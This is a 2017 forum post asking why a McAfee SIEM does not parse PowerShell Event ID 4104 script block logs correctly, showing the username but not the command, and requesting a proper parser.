5 Replies Latest reply on Sep 29, 2017 7:11 AM by anton2016

    PowerShell Event ID 4104 Parsing

    anton2016

      I am wondering if anyone had any luck ingesting this event. I'm running the latest SIEM version and PowerShell Event ID 4104 is not parsing correctly. I see the domain and username but not the command.

       

      ps.png

       

      It's been years since this command was introduced and given the frequency of PowerShell attacks, I'm really surprised that the SIEM cannot parse this event. Event ID 800 is parsing correctly, however this is a legacy event that is not present in WIndows 2016 systems. Event 4104 also contains more information.

       

      If someone from McAfee is reading this, can we please have a proper parser for this event.

       

      Thank you